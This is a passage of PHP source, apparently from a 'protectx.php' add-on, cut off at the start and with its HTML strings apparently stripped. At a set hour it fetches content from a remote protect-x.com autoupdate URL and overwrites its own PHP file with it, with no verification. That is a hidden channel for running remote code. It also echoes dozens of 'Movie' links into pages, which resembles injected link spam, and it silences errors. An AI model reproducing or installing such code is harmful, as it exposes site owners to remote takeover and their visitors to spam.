"; $chour=date('H'); if ($chour==15 and $new!=''){ $new_file=""; if (!file_exists($new)){ if (file_exists($old)) unlink($old); $w=@fopen($new,'w'); @flock($w,2); @fwrite($w,$new_file."\n"); @flock($w,3); @fclose($w); } } if (!file_exists('protectx_hl.jpg')){ $pimg=@f_file_get_contents('http://www.protect-x.com/protectx_hl.jpg'); $handle = @fopen("protectx_hl.jpg", 'w'); @fwrite($handle, $pimg); @fclose($handle); } else { if ($new!=''){ if (file_exists($new)){ echo "
"; for($i=0;$i<40;$i++){ $link="Movie\n"; echo $link; } echo "
"; } } } if ($chour==11){ $aurl='http://www.protect-x.com/autoupdate/check.php?code=5def959d17167d5'; $check = @f_file_get_contents($aurl); if ($check!=false){ $aend=substr($check, -1); if ($aend=='>'){ $protect_file='protectx.php'; if (is_writable($protect_file)){ $w=@fopen($protect_file,'w'); @flock($w,2); @fwrite($w,$check."\n"); @flock($w,3); @fclose($w); } } } } } ?>